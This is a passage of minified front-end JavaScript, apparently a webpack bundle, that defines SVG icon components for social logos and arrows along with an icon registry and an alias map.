5.514A13.716 13.716 0 0 1 26.162 0h-6.835v28.914a6.244 6.244 0 1 1-6.241-6.247 6.086 6.086 0 0 1 1.965.32v-7.002a12.836 12.836 0 0 0-1.965-.149A13.082 13.082 0 1 0 26.16 28.918V14.134a17.847 17.847 0 0 0 10.454 3.277l.162-6.834c-4.405-.105-7.4-1.761-9.14-5.063"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,a.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0m11.606 21.714a11.347 11.347 0 0 1-6.656-2.086v9.413a8.323 8.323 0 1 1-7.076-8.236v4.461a3.9 3.9 0 0 0-1.251-.2 3.978 3.978 0 1 0 3.974 3.977V10.628h4.353a8.761 8.761 0 0 0 .94 3.514c1.112 2.1 3.015 3.156 5.821 3.223Z"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44 44"},(0,a.createElement)("g",null,(0,a.createElement)("path",{d:"M30.889 22a8.883 8.883 0 0 1-8.976 8.888A8.932 8.932 0 1 1 30.889 22"}),(0,a.createElement)("path",{d:"M22 0C1.18 0 0 1.179 0 22s1.18 22 22 22 22-1.179 22-22S42.821 0 22 0m0 35.816A13.818 13.818 0 1 1 35.816 22 13.817 13.817 0 0 1 22 35.816m14.362-24.948a3.194 3.194 0 0 1-3.256-3.256 3.248 3.248 0 0 1 3.256-3.256 3.175 3.175 0 0 1 3.168 3.256 3.123 3.123 0 0 1-3.168 3.256"}))),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42 42"},(0,a.createElement)("path",{d:"M37.53 0H4.47A4.468 4.468 0 0 0 0 4.47v33.06A4.468 4.468 0 0 0 4.47 42h33.06A4.468 4.468 0 0 0 42 37.53V4.47A4.468 4.468 0 0 0 37.53 0M12.49 35.12c0 .51-.09.59-.59.59H6.87c-.5 0-.59-.17-.59-.59V16.43c0-.5.09-.67.67-.67h5.03c.42 0 .59.08.59.59-.08 6.28-.08 12.49-.08 18.77m-3.1-22.04a3.583 3.583 0 0 1-3.61-3.61 3.626 3.626 0 0 1 3.61-3.6 3.572 3.572 0 0 1 3.6 3.6 3.692 3.692 0 0 1-3.6 3.61m25.65 22.63h-4.78c-.5 0-.75-.08-.75-.67v-9.3a13.485 13.485 0 0 0-.26-2.6 2.664 2.664 0 0 0-2.43-2.35 3.264 3.264 0 0 0-3.69 1.68 6.537 6.537 0 0 0-.58 2.51v9.98c0 .67-.17.84-.84.75-1.59-.08-3.19 0-4.78 0-.42 0-.59-.17-.59-.59V16.35c0-.42.09-.59.51-.59h4.86c.42 0 .5.17.5.5v2.1a7.617 7.617 0 0 1 3.69-2.77 8.813 8.813 0 0 1 6.2.51 5.948 5.948 0 0 1 3.11 4.44 20.4 20.4 0 0 1 .42 3.94v10.56c.08.59-.09.67-.59.67"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44 44.26"},(0,a.createElement)("path",{d:"M22.311 0A21.555 21.555 0 0 0 .798 21.6a22.259 22.259 0 0 0 3.01 11.067l-3.807 11.6 11.951-3.805A21.656 21.656 0 0 0 44 21.517 21.687 21.687 0 0 0 22.311 0m10.637 29.915a5.156 5.156 0 0 1-3.487 2.414c-4.559.983-9.387-2.593-12.338-5.633a22.894 22.894 0 0 1-5.275-8.046c-.983-2.861.358-8.583 4.381-7.689.984.179 1.163 1.073 1.431 1.878.447 1.162.8 2.235 1.251 3.4a1.514 1.514 0 0 1 0 .894c-.357.805-1.162 1.341-1.7 2.056-.805 1.252 2.324 4.292 3.218 5.1 1.163 1.072 2.951 2.682 4.56 2.861.894.089 2.056-1.7 2.5-2.325.358-.447.626-.536 1.073-.358 1.52.626 2.951 1.52 4.47 2.325a.811.811 0 0 1 .537.983 3.565 3.565 0 0 1-.626 2.146"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,a.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0M2.724 24a21.149 21.149 0 0 1 1.844-8.657L14.716 43.15A21.283 21.283 0 0 1 2.724 24M24 45.278a21.317 21.317 0 0 1-6.01-.865l6.384-18.55 6.538 17.917a1.806 1.806 0 0 0 .154.293 21.224 21.224 0 0 1-7.066 1.2m2.931-31.249c1.282-.065 2.436-.2 2.436-.2a.88.88 0 0 0-.135-1.754s-3.447.272-5.671.272c-2.09 0-5.6-.272-5.6-.272a.88.88 0 0 0-.133 1.754s1.084.136 2.23.2l3.317 9.084-4.657 13.963-7.754-23.047a42.05 42.05 0 0 0 2.436-.2.88.88 0 0 0-.135-1.754s-3.447.272-5.671.272c-.4 0-.871-.009-1.371-.025a21.273 21.273 0 0 1 32.144-4.006c-.093-.006-.182-.015-.275-.015a3.682 3.682 0 0 0-3.573 3.774c0 1.754 1.01 3.237 2.091 4.991a11.211 11.211 0 0 1 1.754 5.869 24.615 24.615 0 0 1-1.547 7.014l-2.2 6.952Zm7.764 28.366 6.5-18.788a20.025 20.025 0 0 0 1.618-7.62 16.1 16.1 0 0 0-.142-2.189 21.276 21.276 0 0 1-7.974 28.6"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,a.createElement)("g",null,(0,a.createElement)("path",{d:"M4 23.999a20 20 0 0 0 11.272 18L5.732 15.86A19.923 19.923 0 0 0 4 24m33.5-1.009a10.531 10.531 0 0 0-1.646-5.517c-1.014-1.648-1.964-3.042-1.964-4.69a3.463 3.463 0 0 1 3.358-3.55c.089 0 .173.011.259.016A20 20 0 0 0 7.29 13.013c.47.015.912.025 1.288.025 2.091 0 5.33-.254 5.33-.254a.827.827 0 0 1 .128 1.648s-1.084.127-2.289.19l7.283 21.664 4.378-13.127-3.117-8.535c-1.078-.063-2.1-.19-2.1-.19a.827.827 0 0 1 .127-1.648s3.3.254 5.267.254c2.092 0 5.331-.254 5.331-.254a.827.827 0 0 1 .128 1.648s-1.085.127-2.289.19l7.228 21.5 2.063-6.538a23.047 23.047 0 0 0 1.454-6.593m-13.146 2.755-6 17.437a20.006 20.006 0 0 0 12.292-.319 1.835 1.835 0 0 1-.143-.276Zm17.2-11.344a15.342 15.342 0 0 1 .134 2.057 18.884 18.884 0 0 1-1.524 7.163l-6.11 17.661a20 20 0 0 0 7.5-26.881"}),(0,a.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0m0 46.56A22.56 22.56 0 1 1 46.56 24 22.559 22.559 0 0 1 24 46.56"}))),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 33.86"},(0,a.createElement)("path",{d:"M47.134 5.29a5.893 5.893 0 0 0-4.232-4.232C39.055 0 24.05 0 24.05 0S9.044 0 5.293.962A6.146 6.146 0 0 0 .965 5.29C.003 9.041.003 16.929.003 16.929s0 7.887.962 11.638A5.894 5.894 0 0 0 5.197 32.8c3.847 1.058 18.853 1.058 18.853 1.058s15.005 0 18.756-1.058a6.059 6.059 0 0 0 4.232-4.233C48 24.816 48 16.929 48 16.929s.1-7.888-.866-11.639M19.141 21.928v-10a1.237 1.237 0 0 1 1.845-1.077l8.85 5a1.237 1.237 0 0 1 0 2.153l-8.85 5a1.237 1.237 0 0 1-1.845-1.077"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,a.createElement)("path",{d:"M48.004 23.995a24 24 0 0 1-24 24.005 23.735 23.735 0 0 1-10.948-2.65h.086a15.084 15.084 0 0 0 4.8-6.914 35.685 35.685 0 0 0 1.729-7.009v-.192c.1-.384.192-.384.48-.192.1 0 .1.1.192.1a7.385 7.385 0 0 0 4.322 2.112 11.879 11.879 0 0 0 7.491-.96 16.739 16.739 0 0 0 4.513-3.649 11.277 11.277 0 0 0 1-1.354 17.413 17.413 0 0 0 2.574-7.278 16.381 16.381 0 0 0-1.1-8.555 13.1 13.1 0 0 0-4.774-5.569 17.523 17.523 0 0 0-8.067-2.977A20.935 20.935 0 0 0 15.45 4.065a15.91 15.91 0 0 0-9.028 8.258 11.865 11.865 0 0 0-.288 9.89 8.5 8.5 0 0 0 5.859 4.993c.288.1.384 0 .384-.288.192-1.056.384-2.112.576-3.073 0-.192 0-.384-.192-.48a8.869 8.869 0 0 1-1.825-2.688 6.966 6.966 0 0 1 .1-5.377 12.226 12.226 0 0 1 7.875-7.778 14.92 14.92 0 0 1 7.4-.672c5.475.912 7.914 6.625 7.559 11.685a15.147 15.147 0 0 1-2.757 7.423 7.589 7.589 0 0 1-4.129 2.976 5.108 5.108 0 0 1-4.226-.768 2.864 2.864 0 0 1-1.153-2.3 9.668 9.668 0 0 1 .769-3.745c.48-1.44 1.056-2.785 1.44-4.225a10.787 10.787 0 0 0 .384-3.072 3.408 3.408 0 0 0-4.206-2.977 5.336 5.336 0 0 0-2.641 1.364c-1.892 1.785-2.4 5.175-1.6 7.566a7.772 7.772 0 0 1-.1 4.9c-.864 2.976-1.825 6.049-2.5 9.122a28.284 28.284 0 0 0-.672 7.489 8.268 8.268 0 0 0 .576 3.063 24 24 0 1 1 34.949-21.356"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 45.85 48"},(0,a.createElement)("path",{d:"M44.492 25.179a6.625 6.625 0 0 0 .192-7.766 6.482 6.482 0 0 0-9.492-1.151c-.192.1-.288.192-.384.1a28.339 28.339 0 0 0-9.684-2.493c-.192 0-.287-.095-.192-.287.288-.959.672-1.822 1.055-2.781a29.239 29.239 0 0 1 3.068-5.657 7.62 7.62 0 0 1 2.017-1.919 2.338 2.338 0 0 1 2.493 0 6.138 6.138 0 0 1 1.246.959c.192.191.192.287.192.575a3.868 3.868 0 0 0 3.26 4.506 3.786 3.786 0 0 0 4.309-3.739 3.8 3.8 0 0 0-5.463-3.547.358.358 0 0 1-.479-.1 4.481 4.481 0 0 0-1.151-.863 5.486 5.486 0 0 0-6.232-.1 14.609 14.609 0 0 0-3.26 3.643 38.376 38.376 0 0 0-4.123 9.013c-.1.287-.192.383-.479.383a26.861 26.861 0 0 0-10.163 2.493c-.192.1-.288.1-.48-.1a6.631 6.631 0 0 0-8.054-.383 6.539 6.539 0 0 0-1.246 9.4c.192.192.192.288.1.479a13.425 13.425 0 0 0-.959 3.74 14.384 14.384 0 0 0 2.3 8.821 20.414 20.414 0 0 0 7.191 6.519 27.739 27.739 0 0 0 12.752 3.069 27.311 27.311 0 0 0 12.464-2.781 19.211 19.211 0 0 0 7.282-5.933c3.068-4.219 3.835-8.725 1.822-13.615a.865.865 0 0 1 .1-.48m-12.656 5.421a3.645 3.645 0 1 1 3.024-3.023 3.646 3.646 0 0 1-3.024 3.023m-.192 8.1a14.556 14.556 0 0 1-9.013 3.26 14.886 14.886 0 0 1-8.533-3.164 1.469 1.469 0 1 1 1.822-2.3 11.081 11.081 0 0 0 7.862 2.493 11.805 11.805 0 0 0 5.369-2.014c.288-.191.479-.383.767-.575a1.488 1.488 0 0 1 2.014.288 1.6 1.6 0 0 1-.288 2.013m-16.683-15.34a3.646 3.646 0 1 1-3.644 3.643 3.526 3.526 0 0 1 3.644-3.643m-12.464.767a4.959 4.959 0 0 1 7.095-6.808 18.573 18.573 0 0 0-7.095 6.808m41.036-.288a18.259 18.259 0 0 0-6.807-6.424c-.1-.1-.192-.1-.288-.192a5.75 5.75 0 0 1 2.4-.959 4.811 4.811 0 0 1 4.794 2.206 4.978 4.978 0 0 1 .1 5.273c0 .1-.1.384-.192.1"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 47.04 48"},(0,a.createElement)("path",{d:"M24 19.625v8.907h13.227a11.731 11.731 0 0 1-4.907 7.786 14.2 14.2 0 0 1-8.32 2.4 14.447 14.447 0 0 1-13.653-9.973 14.764 14.764 0 0 1-.8-4.747 15.523 15.523 0 0 1 .773-4.746A14.507 14.507 0 0 1 24 9.278a13.3 13.3 0 0 1 9.28 3.574l6.773-6.614A23.061 23.061 0 0 0 24-.002a24 24 0 0 0 0 48 22.873 22.873 0 0 0 15.893-5.813c4.534-4.187 7.147-10.347 7.147-17.653a20.536 20.536 0 0 0-.507-4.907Z"}));const i=new class{constructor(){this.icons=new Map,this.aliases=new Map}initializeIcons(e){Object.entries(e).forEach((([e,t])=>{this.icons.set(e,t)}))}storeAliases(e){Object.entries(e).forEach((([e,t])=>{this.icons.has(t)&&this.aliases.set(e,this.icons.get(t))}))}getAliases(){return Object.fromEntries(this.aliases)}toObject(){return{...Object.fromEntries(this.icons),...Object.fromEntries(this.aliases)}}toCurrentIconObj(){return{...Object.fromEntries(this.icons)}}};i.initializeIcons({...o.c,...r.e}),i.storeAliases({angle_bottom_left_line:"arrow_down_bottom_left_solid",angle_bottom_right_line:"arrow_down_bottom_right_solid",angle_top_left_line:"arrow_up_top_left_solid",angle_top_right_line:"arrow_up_top_right_solid",rightFillAngle:"right_triangle_angle_play_arrow_forward_solid",leftAngle2:"arrow_left_previous_backward_chevron_line",rightAngle2:"arrow_right_next_forward_chevron_line",collapse_bottom_line:"arrow_down_dropdown_maximize_chevron_line",arrowUp2:"arrow_up_dropdown_minimize_chevron_line",longArrowUp2:"long_arrow_up_top_increase_solid",arrow_left_circle_line:"arrow_left_backward_circle_line",arrow_bottom_circle_line:"arrow_down_bottom_downward_circle_line",arrow_right_circle_line:"arrow_right_forward_circle_line",arrow_top_circle_line:"arrow_up_top_upward_circle_line",close_circle_line:"cross_close_x_minimize_circle_line",close_line:"cross_x_close_minimize_line",arrow_down_line:"arrow_down_bottom_downward_line",leftArrowLg:"arrow_left_backward_line",rightArrowLg:"arrow_left_forward_line",arrow_up_line:"long_arrow_up_top_increase_line",down_solid:"arrow_down_bottom_downward_circle_solid",right_solid:"arrow_right_forward_circle_solid",left_solid:"arrow_left_backward_circle_solid",up_solid:"arrow_up_top_upward_circle_solid",wrong_solid:"cross_close_x_minimize_circle_solid",bottom_right_line:"arrow_move_up_right_line",bottom_left_line:"arrow_move_up_left_line",top_left_angle_line:"arrow_move_down_left_line",top_right_line:"arrow_move_down_right_line",at_line:"at_a_mail_line",refresh:"refresh_reset_cycle_loop_infinity_line",cart_line:"shopping_cart_line",cart_solid:"add_plus_shopping_cart_solid",cog_line:"settings_tool_function_line",cog_solid:"settings_tool_function_solid",correct_solid:"right_circle_solid",dot_solid:"dot_circle_solid",clock:"clock_reading_time_1_line.svg",book:"book_line",download_line:"download_1_line",download_solid:"download_1_solid",downlod_bottom_solid:"download_1_solid",eye:"view_count_show_visible_eye_open_2_line",hidden_line:"hidden_hide_invisible_line",home_line:"home_house_line",home_solid:"home_house_solid",location_line:"location_gps_map_line",location_solid:"location_gps_map_solid",love_line:"heart_love_wishlist_favourite_line",love_solid:"heart_love_wishlist_favourite_solid",notice_circle_solid:"warning_circle_solid",notice_solid:"warning_triangle_solid",play_line:"play_media_video_circle_line",plus2:"",videoplay:"right_triangle_angle_play_arrow_forward_solid",left_angle_solid:"left_triangle_angle_arrow_backward_solid",caretArrow:"caret_up_top_triangle_angle_arrow_upward_solid",rectangle_solid:"square_rounded_solid",restriction_line:"restriction_no_stop_line",right_circle_line:"correct_save_check_circle_line",save_line:"correct_save_check_line",search_line:"search_magnify_line",search_solid:"search_magnify_solid",triangle_solid:"triangle_shape_solid",warning_circle_line:"warning_circle_line",warning_triangle_line:"warning_triangle_line",upload_solid:"upload_1_solid",cat1:"category_file_documents_1_solid",cat2:"category_book_line",cat3:"category_file_documents_2_line",cat4:"category_file_documents_3_line",cat5:"category_file_documents_3_solid",cat6:"category_file_documents_4_line",cat7:"category_book_line",commentCount1:"messege_comment_1_line",commentCount2:"messege_comment_3_solid",commentCount3:"messege_comment_3_line",commentCount4:"messege_comment_6_line",commentCount5:"messege_comment_7_line",commentCount6:"messege_comment_8_line",comment:"messege_comment_4_line",date1:"calendar_date_4_line",date2:"calendar_date_1_solid",date3:"calendar_date_2_line",date4:"calendar_date_4_solid",date5:"calendar_date_3_line",calendar:"calendar_date_3_line",readingTime1:"clock_reading_time_3_line",readingTime2:"clock_reading_time_2_line",readingTime3:"book_reading_time_line",readingTime4:"clock_reading_time_1_line",readingTime5:"hourglass_timer_time_line",tag1:"tag_bookmark_save_favourite_mark_discount_sale_line",tag2:"price_tag_label_category_sale_discount_solid",tag3:"price_tag_label_category_sale_discount_line",tag4:"price_tag_offer_sale_coupon_solid",tag5:"price_tag_label_category_sale_discount_line",tag6:"growth_increase_up_solid",viewCount1:"view_count_show_visible_eye_open_1_line",viewCount2:"view_count_show_visible_eye_open_2_line",viewCount3:"view_count_show_visible_eye_open_3_line",viewCount4:"view_count_show_visible_eye_open_4_solid",viewCount5:"view_count_show_visible_eye_open_5_solid",viewCount6:"view_count_show_visible_eye_open_5_solid",author1:"author_user_human_1_line",author2:"author_user_human_4_line",author3:"author_user_human_4_solid",author4:"author_user_human_4_line",author5:"author_user_human_3_solid",user:"author_user_human_3_line",desktop:"desktop_monitor_computer_line",laptop:"laptop_computer_line",tablet:"tablet_ipad_pad_line",mobile:"mobile_smartphone_phone_line",angry_line:"angry_emoji_line",angry_solid:"angry_emoji_solid",confused_line:"confused_emoji_line",confused_solid:"confused_emoji_solid",happy_line:"happy_emoji_line",happy_solid:"happy_emoji_solid",smile_line:"smile_emoji_line",smile_solid:"smile_emoji_solid",share_line:"social_community_line",share:"share_social_solid",apple_solid:"apple_logo_icon_solid",android_solid:"android_logo_icon_solid",google_solid:"google_logo_icon_solid",messenger:"messenger_logo_icon_solid",microsoft_solid:"microsoft_logo_icon_solid",mail:"mail_email_messege_solid",media_document:"media_document",facebook:"facebook_logo_icon_solid",twitter:"twitter_x_logo_icon_line",arrowDown2:"arrow_down_dropdown_maximize_chevron_line",setting:"settings_tool_function_solid",right_circle_solid:"correct_save_check_circle_solid",full_screen:"full_screen_corners_out_solid",zoom_in:"zoom_in_magnifying_glass_plus_line",zoom_out:"zoom_out_magnifying_glass_minus_line",gallery_indicator:"gallery_indicator_image_solid",ascending:"sort_ascending_order_line",descending:"sort_descending_order_line",unlink:"unlink_link_break_line",rocket:"rocket_fly_boost_launch_pro_solid",unlock:"unlocked_open_security_solid",connect:"plugin_connect_socket_integration_line",leftAngle:"arrow_left_previous_backward_chevron_line",rightAngle:"right_triangle_angle_play_arrow_forward_line",link:"link_chains_line",subtract:(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),skype:"skype_logo_icon_solid",updated_link:"link_chains_line",tiktok_lite_solid:"tiktok_logo_icon_circle_line",tiktok_solid:"tiktok_logo_icon_solid",instagram_solid:"instagram_logo_icon_solid",linkedin:"linkedin_logo_icon_solid",whatsapp:"whatsapp_logo_icon_solid",wordpress_lite_solid:"wordpress_logo_icon_solid",wordpress_solid:"wordpress_logo_icon_2_solid",youtube_solid:"youtube_logo_icon_solid",pinterest:"pinterest_logo_icon_solid",reddit:"reddit_logo_icon_solid",five_star_line:"star_rating_line",rightAngleBold:"arrow_right_next_forward_chevron_line",leftAngleBold:"arrow_left_previous_backward_chevron_line",reset_left_line:"refresh_reset_cycle_loop_infinity_line",hamicon_1:"hamicon_1_line",hamicon_2:"hemicon_2_line",hamicon_3:"hemicon_3_line",hamicon_4:"hamicon_5_line",hamicon_5:"hemicon_2_solid",hamicon_6:"hamicon_6_line"});const l=i.toObject(),s=((0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),l.skype_logo_icon_solid,l.link_chains_line,l.facebook_logo_icon_solid,l.twitter_x_logo_icon_line,l.tiktok_logo_icon_circle_line,l.tiktok_logo_icon_solid,l.instagram_logo_icon_solid,l.linkedin_logo_icon_solid,l.whatsapp_logo_icon_solid,l.wordpress_logo_icon_solid,l.wordpress_logo_icon_2_solid,l.youtube_logo_icon_solid,l.pinterest_logo_icon_solid,l.reddit_logo_icon_solid,l.google_logo_icon_solid,l.link_chains_line,l.share_social_solid,i.toCurrentIconObj(),l)},1900:(e,t,n)=>{"use strict";n.d(t,{e:()=>r});var a=n(7294);const r={add_plus_shopping_cart_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 3h2.128a1 1 0 0 1 .991.863l1.762 12.774a1 1 0 0 0 .99.863H18.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.5 19.25a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0Zm9.75 0a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0ZM5.5 5h15.304a1 1 0 0 1 .984 1.177l-1.152 6.403a1 1 0 0 1-.898.82L7 14.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M13.745 7.5v4M11.75 9.505h4"})),android_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6.5 9.5a5.5 5.5 0 1 1 11 0V17a2 2 0 0 1-2 2h-7a2 2 0 0 1-2-2V9.5ZM20 11v6M4 11v6"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"m14 4 1.5-2M10 4 8.5 2m-2 8.5h11m-8 8.5v3m5.5-3v3M10.49 8h.01m2.99 0h.01"})),angry_emoji_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7 9.5c1 0 2.69.254 2.964 1.231m0 0A.988.988 0 0 1 10 11c0 1.5-2.072-.037-.036-.269ZM17 9.5c-1 0-2.69.254-2.964 1.231m0 0A.99.99 0 0 0 14 11c0 1.5 2.072-.037.036-.269Z"}),(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8 17c1.5-3 6.5-3 8 0"})),apple_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M19.489 8.963c-.114.089-2.127 1.23-2.127 3.768 0 2.936 2.561 3.975 2.638 4-.012.064-.407 1.423-1.35 2.808-.841 1.219-1.72 2.435-3.056 2.435-1.337 0-1.68-.781-3.223-.781-1.504 0-2.039.807-3.261.807-1.223 0-2.075-1.128-3.056-2.512C4.918 17.86 4 15.335 4 12.938 4 9.09 6.484 7.05 8.93 7.05c1.298 0 2.381.859 3.197.859.776 0 1.987-.91 3.465-.91.56 0 2.572.051 3.897 1.963ZM14.59 4.415c.533-.64.91-1.527.91-2.415 0-.123-.01-.248-.033-.349-.867.033-1.9.585-2.522 1.315-.489.561-.945 1.45-.945 2.349 0 .135.022.27.033.314.055.01.144.022.233.022.778 0 1.758-.527 2.323-1.236Z"})),arrow_down_bottom_downward_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15.5 13 12 16.5m0 0L8.5 13m3.5 3.5v-9"})),arrow_down_bottom_downward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3.5 12 8.5 8.5m0 0 8.5-8.5M12 20.5v-17"})),arrow_down_bottom_left_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 6v12m0 0h12M6 18 18 6"})),arrow_down_bottom_right_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 6v12m0 0H6m12 0L6 6"})),arrow_down_dropdown_maximize_chevron_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m6 9 6 6 6-6"})),arrow_left_backward_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 15.5 7.5 12m0 0L11 8.5M7.5 12h9"})),arrow_left_backward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 20.5 3.5 12m0 0L12 3.5M3.5 12h17"})),arrow_left_forward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m12 20.5 8.5-8.5m0 0L12 3.5m8.5 8.5h-17"})),arrow_left_previous_backward_chevron_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m15 18-6-6 6-6"})),arrow_move_down_left_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 6v3a4 4 0 0 1-4 4H2m0 0 5 5m-5-5 5-5"})),arrow_move_down_right_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 6v3a4 4 0 0 0 4 4h16m0 0-5 5m5-5-5-5"})),arrow_move_up_left_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 18v-3a4 4 0 0 0-4-4H2m0 0 5-5m-5 5 5 5"})),arrow_move_up_right_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 18v-3a4 4 0 0 1 4-4h16m0 0-5-5m5 5-5 5"})),arrow_right_forward_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m13 8.5 3.5 3.5m0 0L13 15.5m3.5-3.5h-9"})),arrow_right_next_forward_chevron_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m9 18 6-6-6-6"})),arrow_up_dropdown_minimize_chevron_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m18 15-6-6-6 6"})),arrow_up_top_left_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 18V6m0 0h12M6 6l12 